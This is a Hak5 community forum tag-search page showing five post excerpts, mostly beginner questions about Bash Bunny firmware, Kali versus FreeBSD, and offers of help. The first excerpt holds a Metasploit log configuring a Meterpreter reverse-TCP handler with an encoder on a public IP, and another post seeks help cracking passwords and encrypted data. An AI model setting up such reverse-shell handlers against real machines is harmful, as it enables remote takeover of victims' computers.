Jump to content

Search the Community

Showing results for tags 'work'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 5 results

  1. Hello. I was messing around with metasploit. Im using Armitage. Everything worked fine before. I created a new payload and the old one stopped getting a stage. It just hangs at Starting the payload handler... The new one works fine. Need help fixing it please. Here's the Armitage log: msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST PUBLIC IP LHOST => PUBLIC IP msf exploit(handler) > set LPORT 4443 LPORT => 4443 msf exploit(handler) > set Encoder x86/shikata_ga_nai Encoder => x86/shikata_ga_nai msf exploit(handler) > set EXITFUNC process EXITFUNC => process msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > set Iterations 3 Iterations => 3 msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on PUBLIC IP:4443 [*] Starting the payload handler...
  2. Im having some issues updating the bash bunny to the most recent firmware. I am currently on the base firmware from when I have purchased the device and have run apt-get update && apt-get upgrade after getting internet with my linux machine. I then download the firmware .tar file from the downloads area and copy the file to the / directory of the bash bunny. I then safely eject the device in arming mode and plug it back in expecting to see a red blinking light. Unfortunately it does nothing and boots to the regular storage mode and nothing has changed. I have searched the forums for help but I can't seem to figure out why this is happening. Can someone help me out with this issue?
  3. Hi, Im a huge fan of the Hak5 community, I'm not much of a coder but I can work my way around using the rubber ducky and the pineapple nano. I really would like to support some projects but like I mentioned I am still learning, however I work as a graphic designer and I was thinking if anyone needs any specific GUI/general graphics then give me a shout! I know its not as useful as a debugger but I think I can offer a service, here is some of my older work. I appreciate any feedback thanks!
  4. Hello Everyone!!! I'm a student who loves hardware. I work with it a lot and I'm very good at making my custom devices. I have just ordered the PCBs for my latest design. It is the first prototype of a computer meant only for math. This board isn't very powerful and is a little more than a square inch, but I'm hoping in the future it will be very capable. On the square inch there are four low level processors. I have three of them coming and they should work well. I need someone to help me as I want to use these devices to crack mathematical passwords and encrypted data and I have little skill in software. Would anyone like to help? This could either be a huge failure or a resounding success. Either way I hope to publish all my findings and whoever helps loses nothing but maybe a little of their time. Please reply to the thread or PM me if interested.
  5. Just curious I broke into kali alittle bit(2.0), I love the new kali suit even know i'm still using windows 7 : I have not messed around much with unix - however I found debian a sweet suite in whole.... quick and effeciant ... I was taking a gander over freeBsd it looked like the next best thing - running a IBM unix suite *which offcourse is not avaible to general public* from my understanding. Generally I was alittle overbeared with the major disclaimer from at&t.... before homepage that's ok though. I've read up on kali it has a good rep yet not really by the general unix/linux populace why I have no clue* I guess cause it's scary*... even windows runs threw a net frame work and unix... Kindof a silly sort ..... What's you're opinion on which one to use : I know kali run's debian ....... FreeBsd Runs Unix There both new with a grub thats not really the big deal ....... My questions are... *noob friendly please* I know as in the job market im looking forward to taking classe's .... software development c / c++ ...... but from the looks of it, UNIX is a must... Not the funnest question, but to kiss ass alittle I love hack5 I hope to be doing buisness in the near future ..... great educational videos..... keep it going it's hard to find a more alternative education these days. Sincerly, You'rs truly.. Ps. We all google however i'm a lazy bastard. Looking for good advice.
×
×
  • Create New...